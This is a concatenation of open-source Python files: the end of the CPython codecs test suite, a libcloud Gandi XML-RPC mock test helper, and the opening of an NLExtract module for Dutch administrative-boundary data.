{0: a, 1: b, 2: 0xFFFE},
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: a, 1: b}),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: a, 1: b, 2: 0xFFFE}),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: a, 1: b}),
("ab", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: a, 1: b, 2: 0xFFFE}),
("ab", 3)
)
class WithStmtTest(unittest.TestCase):
    """The codecs file-like wrappers must work as context managers."""

    def test_encodedfile(self):
        """EncodedFile transcodes on read and supports the with-statement."""
        raw = io.BytesIO(b"\xc3\xbc")
        with codecs.EncodedFile(raw, "latin-1", "utf-8") as wrapped:
            transcoded = wrapped.read()
        self.assertEqual(transcoded, b"\xfc")

    def test_streamreaderwriter(self):
        """StreamReaderWriter decodes on read and supports the with-statement."""
        raw = io.BytesIO(b"\xc3\xbc")
        utf8 = codecs.lookup("utf-8")
        with codecs.StreamReaderWriter(raw, utf8.streamreader,
                                       utf8.streamwriter, 'strict') as stream:
            decoded = stream.read()
        self.assertEqual(decoded, "\xfc")
class TypesTest(unittest.TestCase):
    """Input-type checks for the low-level codec functions."""

    def test_decode_unicode(self):
        """Byte-oriented decoders must reject str input with TypeError."""
        # Most decoders don't accept unicode input
        decoders = [
            codecs.utf_7_decode,
            codecs.utf_8_decode,
            codecs.utf_16_le_decode,
            codecs.utf_16_be_decode,
            codecs.utf_16_ex_decode,
            codecs.utf_32_decode,
            codecs.utf_32_le_decode,
            codecs.utf_32_be_decode,
            codecs.utf_32_ex_decode,
            codecs.latin_1_decode,
            codecs.ascii_decode,
            codecs.charmap_decode,
        ]
        # mbcs only exists on Windows builds.
        if hasattr(codecs, "mbcs_decode"):
            decoders.append(codecs.mbcs_decode)
        for decoder in decoders:
            self.assertRaises(TypeError, decoder, "xxx")

    def test_unicode_escape(self):
        """The escape decoders accept str as well as bytes input."""
        # Escape-decoding a unicode string is supported and gives the same
        # result as decoding the equivalent ASCII bytes string.
        self.assertEqual(codecs.unicode_escape_decode(r"\u1234"), ("\u1234", 6))
        self.assertEqual(codecs.unicode_escape_decode(br"\u1234"), ("\u1234", 6))
        self.assertEqual(codecs.raw_unicode_escape_decode(r"\u1234"), ("\u1234", 6))
        self.assertEqual(codecs.raw_unicode_escape_decode(br"\u1234"), ("\u1234", 6))
        # Code points beyond U+10FFFF are rejected (or replaced, depending
        # on the error handler) for both input types.
        self.assertRaises(UnicodeDecodeError, codecs.unicode_escape_decode, br"\U00110000")
        self.assertEqual(codecs.unicode_escape_decode(r"\U00110000", "replace"), ("\ufffd", 10))
        self.assertRaises(UnicodeDecodeError, codecs.raw_unicode_escape_decode, br"\U00110000")
        self.assertEqual(codecs.raw_unicode_escape_decode(r"\U00110000", "replace"), ("\ufffd", 10))
class UnicodeEscapeTest(unittest.TestCase):
    """Behaviour of the ``unicode_escape`` codec."""

    def test_empty(self):
        """Empty input encodes/decodes to empty output, consuming 0 items."""
        self.assertEqual(codecs.unicode_escape_encode(""), (b"", 0))
        self.assertEqual(codecs.unicode_escape_decode(b""), ("", 0))

    def test_raw_encode(self):
        """Printable ASCII (except backslash) passes through unescaped."""
        encode = codecs.unicode_escape_encode
        for b in range(32, 127):
            if b != b'\\'[0]:
                self.assertEqual(encode(chr(b)), (bytes([b]), 1))

    def test_raw_decode(self):
        """Any non-backslash byte decodes to the same code point."""
        decode = codecs.unicode_escape_decode
        for b in range(256):
            if b != b'\\'[0]:
                self.assertEqual(decode(bytes([b]) + b'0'), (chr(b) + '0', 2))

    def test_escape_encode(self):
        """Control, non-ASCII and non-Latin-1 chars get escape sequences."""
        encode = codecs.unicode_escape_encode
        check = coding_checker(self, encode)
        # Named single-character escapes.
        check('\t', br'\t')
        check('\n', br'\n')
        check('\r', br'\r')
        check('\\', br'\\')
        # Remaining C0 controls and all bytes >= 0x7f use \xHH.
        for b in range(32):
            if chr(b) not in '\t\n\r':
                check(chr(b), ('\\x%02x' % b).encode())
        for b in range(127, 256):
            check(chr(b), ('\\x%02x' % b).encode())
        # BMP and astral characters use \uXXXX / \UXXXXXXXX.
        check('\u20ac', br'\u20ac')
        check('\U0001d120', br'\U0001d120')

    def test_escape_decode(self):
        """All recognised escape sequences decode; unknown ones pass through."""
        decode = codecs.unicode_escape_decode
        check = coding_checker(self, decode)
        # Backslash-newline is a line continuation and disappears.
        check(b"[\\\n]", "[]")
        check(br'[\"]', '["]')
        check(br"[\']", "[']")
        check(br"[\\]", r"[\]")
        check(br"[\a]", "[\x07]")
        check(br"[\b]", "[\x08]")
        check(br"[\t]", "[\x09]")
        check(br"[\n]", "[\x0a]")
        check(br"[\v]", "[\x0b]")
        check(br"[\f]", "[\x0c]")
        check(br"[\r]", "[\x0d]")
        # Octal escapes take at most three digits; \8 is not octal.
        check(br"[\7]", "[\x07]")
        check(br"[\8]", r"[\8]")
        check(br"[\78]", "[\x078]")
        check(br"[\41]", "[!]")
        check(br"[\418]", "[!8]")
        check(br"[\101]", "[A]")
        check(br"[\1010]", "[A0]")
        # Hex escapes take exactly two digits.
        check(br"[\x41]", "[A]")
        check(br"[\x410]", "[A0]")
        check(br"\u20ac", "\u20ac")
        check(br"\U0001d120", "\U0001d120")
        # Any other backslash-byte pair is left verbatim.
        for b in range(256):
            if b not in b'\n"\'\\abtnvfr01234567xuUN':
                check(b'\\' + bytes([b]), '\\' + chr(b))

    def test_decode_errors(self):
        """Truncated \\x / \\u / \\U sequences honour the error handler."""
        decode = codecs.unicode_escape_decode
        for c, d in (b'x', 2), (b'u', 4), (b'U', 4):
            # i < d digits is always too few, at end of input or not.
            for i in range(d):
                self.assertRaises(UnicodeDecodeError, decode,
                                  b"\\" + c + b"0"*i)
                self.assertRaises(UnicodeDecodeError, decode,
                                  b"[\\" + c + b"0"*i + b"]")
                data = b"[\\" + c + b"0"*i + b"]\\" + c + b"0"*i
                self.assertEqual(decode(data, "ignore"), ("[]", len(data)))
                self.assertEqual(decode(data, "replace"),
                                 ("[\ufffd]\ufffd", len(data)))
        # \U escapes above U+10FFFF are invalid code points.
        self.assertRaises(UnicodeDecodeError, decode, br"\U00110000")
        self.assertEqual(decode(br"\U00110000", "ignore"), ("", 10))
        self.assertEqual(decode(br"\U00110000", "replace"), ("\ufffd", 10))
class RawUnicodeEscapeTest(unittest.TestCase):
    """Behaviour of the ``raw_unicode_escape`` codec.

    Unlike ``unicode_escape`` it only treats ``\\u`` and ``\\U`` as
    escapes; every other byte (including backslash pairs) is literal.
    """

    def test_empty(self):
        """Empty input encodes/decodes to empty output, consuming 0 items."""
        self.assertEqual(codecs.raw_unicode_escape_encode(""), (b"", 0))
        self.assertEqual(codecs.raw_unicode_escape_decode(b""), ("", 0))

    def test_raw_encode(self):
        """Every Latin-1 character encodes to its own byte."""
        encode = codecs.raw_unicode_escape_encode
        for b in range(256):
            self.assertEqual(encode(chr(b)), (bytes([b]), 1))

    def test_raw_decode(self):
        """Every byte decodes to the same code point."""
        decode = codecs.raw_unicode_escape_decode
        for b in range(256):
            self.assertEqual(decode(bytes([b]) + b'0'), (chr(b) + '0', 2))

    def test_escape_encode(self):
        """Backslash pairs stay literal; non-Latin-1 chars get \\u / \\U."""
        encode = codecs.raw_unicode_escape_encode
        check = coding_checker(self, encode)
        for b in range(256):
            if b not in b'uU':
                check('\\' + chr(b), b'\\' + bytes([b]))
        check('\u20ac', br'\u20ac')
        check('\U0001d120', br'\U0001d120')

    def test_escape_decode(self):
        """Only \\u and \\U are interpreted; other pairs pass through."""
        decode = codecs.raw_unicode_escape_decode
        check = coding_checker(self, decode)
        for b in range(256):
            if b not in b'uU':
                check(b'\\' + bytes([b]), '\\' + chr(b))
        check(br"\u20ac", "\u20ac")
        check(br"\U0001d120", "\U0001d120")

    def test_decode_errors(self):
        """Truncated \\u / \\U sequences honour the error handler."""
        decode = codecs.raw_unicode_escape_decode
        for c, d in (b'u', 4), (b'U', 4):
            for i in range(d):
                self.assertRaises(UnicodeDecodeError, decode,
                                  b"\\" + c + b"0"*i)
                self.assertRaises(UnicodeDecodeError, decode,
                                  b"[\\" + c + b"0"*i + b"]")
                data = b"[\\" + c + b"0"*i + b"]\\" + c + b"0"*i
                self.assertEqual(decode(data, "ignore"), ("[]", len(data)))
                self.assertEqual(decode(data, "replace"),
                                 ("[\ufffd]\ufffd", len(data)))
        # \U escapes above U+10FFFF are invalid code points.
        self.assertRaises(UnicodeDecodeError, decode, br"\U00110000")
        self.assertEqual(decode(br"\U00110000", "ignore"), ("", 10))
        self.assertEqual(decode(br"\U00110000", "replace"), ("\ufffd", 10))
class SurrogateEscapeTest(unittest.TestCase):
    """Round-trips of undecodable bytes via the "surrogateescape" handler."""

    def _check_roundtrip(self, encoded, decoded, encoding):
        """Assert *encoded* <-> *decoded* map onto each other under *encoding*."""
        self.assertEqual(encoded.decode(encoding, "surrogateescape"), decoded)
        self.assertEqual(decoded.encode(encoding, "surrogateescape"), encoded)

    def test_utf8(self):
        # A stray byte becomes a lone low surrogate and encodes back.
        self._check_roundtrip(b"foo\x80bar", "foo\udc80bar", "utf-8")
        # A surrogate smuggled in as ill-formed UTF-8 also round-trips.
        self._check_roundtrip(b"\xed\xb0\x80", "\udced\udcb0\udc80", "utf-8")

    def test_ascii(self):
        # Bytes >= 0x80 are invalid ASCII and get escaped.
        self._check_roundtrip(b"foo\x80bar", "foo\udc80bar", "ascii")

    def test_charmap(self):
        # \xa5 has no mapping in iso-8859-3.
        self._check_roundtrip(b"foo\xa5bar", "foo\udca5bar", "iso-8859-3")

    def test_latin1(self):
        # Issue6373: encoding escaped surrogates to latin-1 must work.
        self.assertEqual("\udce4\udceb\udcef\udcf6\udcfc".encode("latin-1", "surrogateescape"),
                         b"\xe4\xeb\xef\xf6\xfc")
class BomTest(unittest.TestCase):
    """BOM handling of codecs.open() streams for the BOM-writing encodings."""

    def test_seek0(self):
        """The BOM must be written exactly once, and only at offset 0."""
        data = "1234567890"
        tests = ("utf-16",
                 "utf-16-le",
                 "utf-16-be",
                 "utf-32",
                 "utf-32-le",
                 "utf-32-be")
        self.addCleanup(support.unlink, support.TESTFN)
        for encoding in tests:
            # Check if the BOM is written only once
            with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
                f.write(data)
                f.write(data)
                f.seek(0)
                self.assertEqual(f.read(), data * 2)
                f.seek(0)
                self.assertEqual(f.read(), data * 2)
            # Check that the BOM is written after a seek(0)
            with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
                f.write(data[0])
                self.assertNotEqual(f.tell(), 0)
                f.seek(0)
                f.write(data)
                f.seek(0)
                self.assertEqual(f.read(), data)
            # (StreamWriter) Check that the BOM is written after a seek(0)
            # f.writer is the underlying writer object, bypassing the
            # StreamReaderWriter wrapper.
            with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
                f.writer.write(data[0])
                self.assertNotEqual(f.writer.tell(), 0)
                f.writer.seek(0)
                f.writer.write(data)
                f.seek(0)
                self.assertEqual(f.read(), data)
            # Check that the BOM is not written after a seek() at a position
            # different than the start
            with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
                f.write(data)
                f.seek(f.tell())
                f.write(data)
                f.seek(0)
                self.assertEqual(f.read(), data * 2)
            # (StreamWriter) Check that the BOM is not written after a seek()
            # at a position different than the start
            with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
                f.writer.write(data)
                f.writer.seek(f.writer.tell())
                f.writer.write(data)
                f.seek(0)
                self.assertEqual(f.read(), data * 2)
bytes_transform_encodings = [
"base64_codec",
"uu_codec",
"quopri_codec",
"hex_codec",
]
transform_aliases = {
"base64_codec": ["base64", "base_64"],
"uu_codec": ["uu"],
"quopri_codec": ["quopri", "quoted_printable", "quotedprintable"],
"hex_codec": ["hex"],
"rot_13": ["rot13"],
}
try:
import zlib
except ImportError:
zlib = None
else:
bytes_transform_encodings.append("zlib_codec")
transform_aliases["zlib_codec"] = ["zip", "zlib"]
try:
import bz2
except ImportError:
pass
else:
bytes_transform_encodings.append("bz2_codec")
transform_aliases["bz2_codec"] = ["bz2"]
class TransformCodecTest(unittest.TestCase):
def test_basics(self):
binput = bytes(range(256))
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
# generic codecs interface
(o, size) = codecs.getencoder(encoding)(binput)
self.assertEqual(size, len(binput))
(i, size) = codecs.getdecoder(encoding)(o)
self.assertEqual(size, len(o))
self.assertEqual(i, binput)
def test_read(self):
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
sin = codecs.encode(b"\x80", encoding)
reader = codecs.getreader(encoding)(io.BytesIO(sin))
sout = reader.read()
self.assertEqual(sout, b"\x80")
def test_readline(self):
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
sin = codecs.encode(b"\x80", encoding)
reader = codecs.getreader(encoding)(io.BytesIO(sin))
sout = reader.readline()
self.assertEqual(sout, b"\x80")
def test_buffer_api_usage(self):
# We check all the transform codecs accept memoryview input
# for encoding and decoding
# and also that they roundtrip correctly
original = b"12345\x80"
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
data = original
view = memoryview(data)
data = codecs.encode(data, encoding)
view_encoded = codecs.encode(view, encoding)
self.assertEqual(view_encoded, data)
view = memoryview(data)
data = codecs.decode(data, encoding)
self.assertEqual(data, original)
view_decoded = codecs.decode(view, encoding)
self.assertEqual(view_decoded, data)
def test_text_to_binary_blacklists_binary_transforms(self):
# Check binary -> binary codecs give a good error for str input
bad_input = "bad input type"
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
fmt = ( "{!r} is not a text encoding; "
"use codecs.encode\(\) to handle arbitrary codecs")
msg = fmt.format(encoding)
with self.assertRaisesRegex(LookupError, msg) as failure:
bad_input.encode(encoding)
self.assertIsNone(failure.exception.__cause__)
def test_text_to_binary_blacklists_text_transforms(self):
# Check str.encode gives a good error message for str -> str codecs
msg = (r"^'rot_13' is not a text encoding; "
"use codecs.encode\(\) to handle arbitrary codecs")
with self.assertRaisesRegex(LookupError, msg):
"just an example message".encode("rot_13")
def test_binary_to_text_blacklists_binary_transforms(self):
# Check bytes.decode and bytearray.decode give a good error
# message for binary -> binary codecs
data = b"encode first to ensure we meet any format restrictions"
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
encoded_data = codecs.encode(data, encoding)
fmt = (r"{!r} is not a text encoding; "
"use codecs.decode\(\) to handle arbitrary codecs")
msg = fmt.format(encoding)
with self.assertRaisesRegex(LookupError, msg):
encoded_data.decode(encoding)
with self.assertRaisesRegex(LookupError, msg):
bytearray(encoded_data).decode(encoding)
def test_binary_to_text_blacklists_text_transforms(self):
# Check str -> str codec gives a good error for binary input
for bad_input in (b"immutable", bytearray(b"mutable")):
with self.subTest(bad_input=bad_input):
msg = (r"^'rot_13' is not a text encoding; "
"use codecs.decode\(\) to handle arbitrary codecs")
with self.assertRaisesRegex(LookupError, msg) as failure:
bad_input.decode("rot_13")
self.assertIsNone(failure.exception.__cause__)
@unittest.skipUnless(zlib, "Requires zlib support")
def test_custom_zlib_error_is_wrapped(self):
# Check zlib codec gives a good error for malformed input
msg = "^decoding with 'zlib_codec' codec failed"
with self.assertRaisesRegex(Exception, msg) as failure:
codecs.decode(b"hello", "zlib_codec")
self.assertIsInstance(failure.exception.__cause__,
type(failure.exception))
def test_custom_hex_error_is_wrapped(self):
# Check hex codec gives a good error for malformed input
msg = "^decoding with 'hex_codec' codec failed"
with self.assertRaisesRegex(Exception, msg) as failure:
codecs.decode(b"hello", "hex_codec")
self.assertIsInstance(failure.exception.__cause__,
type(failure.exception))
# Unfortunately, the bz2 module throws OSError, which the codec
# machinery currently can't wrap :(
# Ensure codec aliases from http://bugs.python.org/issue7475 work
def test_aliases(self):
for codec_name, aliases in transform_aliases.items():
expected_name = codecs.lookup(codec_name).name
for alias in aliases:
with self.subTest(alias=alias):
info = codecs.lookup(alias)
self.assertEqual(info.name, expected_name)
# The codec system tries to wrap exceptions in order to ensure the error
# mentions the operation being performed and the codec involved. We
# currently *only* want this to happen for relatively stateless
# exceptions, where the only significant information they contain is their
# type and a single str argument.
# Use a local codec registry to avoid appearing to leak objects when
# registering multiple seach functions
_TEST_CODECS = {}
def _get_test_codec(codec_name):
return _TEST_CODECS.get(codec_name)
codecs.register(_get_test_codec) # Returns None, not usable as a decorator
try:
# Issue #22166: Also need to clear the internal cache in CPython
from _codecs import _forget_codec
except ImportError:
def _forget_codec(codec_name):
pass
class ExceptionChainingTest(unittest.TestCase):
def setUp(self):
# There's no way to unregister a codec search function, so we just
# ensure we render this one fairly harmless after the test
# case finishes by using the test case repr as the codec name
# The codecs module normalizes codec names, although this doesn't
# appear to be formally documented...
# We also make sure we use a truly unique id for the custom codec
# to avoid issues with the codec cache when running these tests
# multiple times (e.g. when hunting for refleaks)
unique_id = repr(self) + str(id(self))
self.codec_name = encodings.normalize_encoding(unique_id).lower()
# We store the object to raise on the instance because of a bad
# interaction between the codec caching (which means we can't
# recreate the codec entry) and regrtest refleak hunting (which
# runs the same test instance multiple times). This means we
# need to ensure the codecs call back in to the instance to find
# out which exception to raise rather than binding them in a
# closure to an object that may change on the next run
self.obj_to_raise = RuntimeError
def tearDown(self):
_TEST_CODECS.pop(self.codec_name, None)
# Issue #22166: Also pop from caches to avoid appearance of ref leaks
encodings._cache.pop(self.codec_name, None)
try:
_forget_codec(self.codec_name)
except KeyError:
pass
def set_codec(self, encode, decode):
codec_info = codecs.CodecInfo(encode, decode,
name=self.codec_name)
_TEST_CODECS[self.codec_name] = codec_info
@contextlib.contextmanager
def assertWrapped(self, operation, exc_type, msg):
full_msg = r"{} with {!r} codec failed \({}: {}\)".format(
operation, self.codec_name, exc_type.__name__, msg)
with self.assertRaisesRegex(exc_type, full_msg) as caught:
yield caught
self.assertIsInstance(caught.exception.__cause__, exc_type)
self.assertIsNotNone(caught.exception.__cause__.__traceback__)
def raise_obj(self, *args, **kwds):
# Helper to dynamically change the object raised by a test codec
raise self.obj_to_raise
def check_wrapped(self, obj_to_raise, msg, exc_type=RuntimeError):
self.obj_to_raise = obj_to_raise
self.set_codec(self.raise_obj, self.raise_obj)
with self.assertWrapped("encoding", exc_type, msg):
"str_input".encode(self.codec_name)
with self.assertWrapped("encoding", exc_type, msg):
codecs.encode("str_input", self.codec_name)
with self.assertWrapped("decoding", exc_type, msg):
b"bytes input".decode(self.codec_name)
with self.assertWrapped("decoding", exc_type, msg):
codecs.decode(b"bytes input", self.codec_name)
def test_raise_by_type(self):
self.check_wrapped(RuntimeError, "")
def test_raise_by_value(self):
msg = "This should be wrapped"
self.check_wrapped(RuntimeError(msg), msg)
def test_raise_grandchild_subclass_exact_size(self):
msg = "This should be wrapped"
class MyRuntimeError(RuntimeError):
__slots__ = ()
self.check_wrapped(MyRuntimeError(msg), msg, MyRuntimeError)
def test_raise_subclass_with_weakref_support(self):
msg = "This should be wrapped"
class MyRuntimeError(RuntimeError):
pass
self.check_wrapped(MyRuntimeError(msg), msg, MyRuntimeError)
def check_not_wrapped(self, obj_to_raise, msg):
def raise_obj(*args, **kwds):
raise obj_to_raise
self.set_codec(raise_obj, raise_obj)
with self.assertRaisesRegex(RuntimeError, msg):
"str input".encode(self.codec_name)
with self.assertRaisesRegex(RuntimeError, msg):
codecs.encode("str input", self.codec_name)
with self.assertRaisesRegex(RuntimeError, msg):
b"bytes input".decode(self.codec_name)
with self.assertRaisesRegex(RuntimeError, msg):
codecs.decode(b"bytes input", self.codec_name)
def test_init_override_is_not_wrapped(self):
class CustomInit(RuntimeError):
def __init__(self):
pass
self.check_not_wrapped(CustomInit, "")
def test_new_override_is_not_wrapped(self):
class CustomNew(RuntimeError):
def __new__(cls):
return super().__new__(cls)
self.check_not_wrapped(CustomNew, "")
def test_instance_attribute_is_not_wrapped(self):
msg = "This should NOT be wrapped"
exc = RuntimeError(msg)
exc.attr = 1
self.check_not_wrapped(exc, "^{}$".format(msg))
def test_non_str_arg_is_not_wrapped(self):
self.check_not_wrapped(RuntimeError(1), "1")
def test_multiple_args_is_not_wrapped(self):
msg_re = r"^\('a', 'b', 'c'\)$"
self.check_not_wrapped(RuntimeError('a', 'b', 'c'), msg_re)
# http://bugs.python.org/issue19609
def test_codec_lookup_failure_not_wrapped(self):
msg = "^unknown encoding: {}$".format(self.codec_name)
# The initial codec lookup should not be wrapped
with self.assertRaisesRegex(LookupError, msg):
"str input".encode(self.codec_name)
with self.assertRaisesRegex(LookupError, msg):
codecs.encode("str input", self.codec_name)
with self.assertRaisesRegex(LookupError, msg):
b"bytes input".decode(self.codec_name)
with self.assertRaisesRegex(LookupError, msg):
codecs.decode(b"bytes input", self.codec_name)
def test_unflagged_non_text_codec_handling(self):
# The stdlib non-text codecs are now marked so they're
# pre-emptively skipped by the text model related methods
# However, third party codecs won't be flagged, so we still make
# sure the case where an inappropriate output type is produced is
# handled appropriately
def encode_to_str(*args, **kwds):
return "not bytes!", 0
def decode_to_bytes(*args, **kwds):
return b"not str!", 0
self.set_codec(encode_to_str, decode_to_bytes)
# No input or output type checks on the codecs module functions
encoded = codecs.encode(None, self.codec_name)
self.assertEqual(encoded, "not bytes!")
decoded = codecs.decode(None, self.codec_name)
self.assertEqual(decoded, b"not str!")
# Text model methods should complain
fmt = (r"^{!r} encoder returned 'str' instead of 'bytes'; "
"use codecs.encode\(\) to encode to arbitrary types$")
msg = fmt.format(self.codec_name)
with self.assertRaisesRegex(TypeError, msg):
"str_input".encode(self.codec_name)
fmt = (r"^{!r} decoder returned 'bytes' instead of 'str'; "
"use codecs.decode\(\) to decode to arbitrary types$")
msg = fmt.format(self.codec_name)
with self.assertRaisesRegex(TypeError, msg):
b"bytes input".decode(self.codec_name)
@unittest.skipUnless(sys.platform == 'win32',
'code pages are specific to Windows')
class CodePageTest(unittest.TestCase):
# CP_UTF8 is already tested by CP65001Test
CP_UTF8 = 65001
def test_invalid_code_page(self):
self.assertRaises(ValueError, codecs.code_page_encode, -1, 'a')
self.assertRaises(ValueError, codecs.code_page_decode, -1, b'a')
self.assertRaises(OSError, codecs.code_page_encode, 123, 'a')
self.assertRaises(OSError, codecs.code_page_decode, 123, b'a')
def test_code_page_name(self):
self.assertRaisesRegex(UnicodeEncodeError, 'cp932',
codecs.code_page_encode, 932, '\xff')
self.assertRaisesRegex(UnicodeDecodeError, 'cp932',
codecs.code_page_decode, 932, b'\x81\x00')
self.assertRaisesRegex(UnicodeDecodeError, 'CP_UTF8',
codecs.code_page_decode, self.CP_UTF8, b'\xff')
def check_decode(self, cp, tests):
for raw, errors, expected in tests:
if expected is not None:
try:
decoded = codecs.code_page_decode(cp, raw, errors)
except UnicodeDecodeError as err:
self.fail('Unable to decode %a from "cp%s" with '
'errors=%r: %s' % (raw, cp, errors, err))
self.assertEqual(decoded[0], expected,
'%a.decode("cp%s", %r)=%a != %a'
% (raw, cp, errors, decoded[0], expected))
# assert 0 <= decoded[1] <= len(raw)
self.assertGreaterEqual(decoded[1], 0)
self.assertLessEqual(decoded[1], len(raw))
else:
self.assertRaises(UnicodeDecodeError,
codecs.code_page_decode, cp, raw, errors)
def check_encode(self, cp, tests):
for text, errors, expected in tests:
if expected is not None:
try:
encoded = codecs.code_page_encode(cp, text, errors)
except UnicodeEncodeError as err:
self.fail('Unable to encode %a to "cp%s" with '
'errors=%r: %s' % (text, cp, errors, err))
self.assertEqual(encoded[0], expected,
'%a.encode("cp%s", %r)=%a != %a'
% (text, cp, errors, encoded[0], expected))
self.assertEqual(encoded[1], len(text))
else:
self.assertRaises(UnicodeEncodeError,
codecs.code_page_encode, cp, text, errors)
def test_cp932(self):
self.check_encode(932, (
('abc', 'strict', b'abc'),
('\uff44\u9a3e', 'strict', b'\x82\x84\xe9\x80'),
# test error handlers
('\xff', 'strict', None),
('[\xff]', 'ignore', b'[]'),
('[\xff]', 'replace', b'[y]'),
('[\u20ac]', 'replace', b'[?]'),
('[\xff]', 'backslashreplace', b'[\\xff]'),
('[\xff]', 'xmlcharrefreplace', b'[ÿ]'),
))
self.check_decode(932, (
(b'abc', 'strict', 'abc'),
(b'\x82\x84\xe9\x80', 'strict', '\uff44\u9a3e'),
# invalid bytes
(b'[\xff]', 'strict', None),
(b'[\xff]', 'ignore', '[]'),
(b'[\xff]', 'replace', '[\ufffd]'),
(b'[\xff]', 'surrogateescape', '[\udcff]'),
(b'\x81\x00abc', 'strict', None),
(b'\x81\x00abc', 'ignore', '\x00abc'),
(b'\x81\x00abc', 'replace', '\ufffd\x00abc'),
))
def test_cp1252(self):
self.check_encode(1252, (
('abc', 'strict', b'abc'),
('\xe9\u20ac', 'strict', b'\xe9\x80'),
('\xff', 'strict', b'\xff'),
('\u0141', 'strict', None),
('\u0141', 'ignore', b''),
('\u0141', 'replace', b'L'),
))
self.check_decode(1252, (
(b'abc', 'strict', 'abc'),
(b'\xe9\x80', 'strict', '\xe9\u20ac'),
(b'\xff', 'strict', '\xff'),
))
def test_cp_utf7(self):
cp = 65000
self.check_encode(cp, (
('abc', 'strict', b'abc'),
('\xe9\u20ac', 'strict', b'+AOkgrA-'),
('\U0010ffff', 'strict', b'+2//f/w-'),
('\udc80', 'strict', b'+3IA-'),
('\ufffd', 'strict', b'+//0-'),
))
self.check_decode(cp, (
(b'abc', 'strict', 'abc'),
(b'+AOkgrA-', 'strict', '\xe9\u20ac'),
(b'+2//f/w-', 'strict', '\U0010ffff'),
(b'+3IA-', 'strict', '\udc80'),
(b'+//0-', 'strict', '\ufffd'),
# invalid bytes
(b'[+/]', 'strict', '[]'),
(b'[\xff]', 'strict', '[\xff]'),
))
def test_multibyte_encoding(self):
self.check_decode(932, (
(b'\x84\xe9\x80', 'ignore', '\u9a3e'),
(b'\x84\xe9\x80', 'replace', '\ufffd\u9a3e'),
))
self.check_decode(self.CP_UTF8, (
(b'\xff\xf4\x8f\xbf\xbf', 'ignore', '\U0010ffff'),
(b'\xff\xf4\x8f\xbf\xbf', 'replace', '\ufffd\U0010ffff'),
))
if VISTA_OR_LATER:
self.check_encode(self.CP_UTF8, (
('[\U0010ffff\uDC80]', 'ignore', b'[\xf4\x8f\xbf\xbf]'),
('[\U0010ffff\uDC80]', 'replace', b'[\xf4\x8f\xbf\xbf?]'),
))
def test_incremental(self):
decoded = codecs.code_page_decode(932, b'\x82', 'strict', False)
self.assertEqual(decoded, ('', 0))
decoded = codecs.code_page_decode(932,
b'\xe9\x80\xe9', 'strict',
False)
self.assertEqual(decoded, ('\u9a3e', 2))
decoded = codecs.code_page_decode(932,
b'\xe9\x80\xe9\x80', 'strict',
False)
self.assertEqual(decoded, ('\u9a3e\u9a3e', 4))
decoded = codecs.code_page_decode(932,
b'abc', 'strict',
False)
self.assertEqual(decoded, ('abc', 3))
if __name__ == "__main__":
unittest.main()
| lgpl-3.0 |
MrBasset/libcloud | libcloud/test/common/test_gandi.py | 66 | 1293 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from libcloud.utils.py3 import xmlrpclib
from libcloud.test import MockHttp
class BaseGandiMockHttp(MockHttp):
    """MockHttp subclass that dispatches Gandi XML-RPC calls by method name.

    Gandi's API is XML-RPC over a single URL, so the HTTP path cannot be
    used for dispatch; instead the RPC method name inside the request
    body selects the mock handler.
    """

    def _get_method_name(self, type, use_param, qs, path):
        # Route every request through _xmlrpc regardless of URL path.
        return "_xmlrpc"

    def _xmlrpc(self, method, url, body, headers):
        # Decode the XML-RPC envelope and dispatch to a handler named
        # after the RPC method, e.g. "hosting.vm.list" ->
        # _xmlrpc__hosting_vm_list (with self.type appended when set).
        params, methodName = xmlrpclib.loads(body)
        meth_name = '_xmlrpc__' + methodName.replace('.', '_')
        if self.type:
            meth_name = '%s_%s' % (meth_name, self.type)
        return getattr(self, meth_name)(method, url, body, headers)
| apache-2.0 |
sebastic/NLExtract | bag/src/bestuurlijkobject.py | 2 | 5596 | __author__ = "Just van den Broecke"
__date__ = "Dec 25, 2011 3:46:27 PM$"
"""
Naam: BestuurlijkObject.py
Omschrijving: Classes voor Bestuurlijke objecten
De BAG bevat geen bestuurlijke objecten, zoals gemeenten en provincies.
Daarom verrijken we de BAG met additionele bestuurlijke data. Deze is te verkrijegn via Kadaster
en CBS.
De BestuurlijkObject classes zijn afgeleid van de basisclass BestuurlijkObject.
Auteur: Just van den Broecke (Milo van der Linden origineel)
Versie: 1.0
- basis versie
Datum: 25 december 2011
OpenGeoGroep.nl
"""
import datetime
import time
def getDate(node):
    """
    Parse a CSV date value into a ``datetime.datetime``.

    Currently only used for the gemeente_woonplaats CSV, which carries
    dates either as ``DD-MM-YYYY`` (10 characters) or ``YYYYMMDD``
    (8 characters).

    Returns None for non-string input, empty strings, and strings of an
    unexpected length.  Raises ValueError if a string of the right
    length does not match the expected format.
    """
    # isinstance instead of type(...) == str: also accepts str subclasses.
    if not isinstance(node, str) or not node:
        return None
    if len(node) == 10:
        # e.g. "25-12-2011"
        return datetime.datetime.strptime(node, "%d-%m-%Y")
    if len(node) == 8:
        # e.g. "20111225"
        return datetime.datetime.strptime(node, "%Y%m%d")
    return None
def getNumber(node):
    """
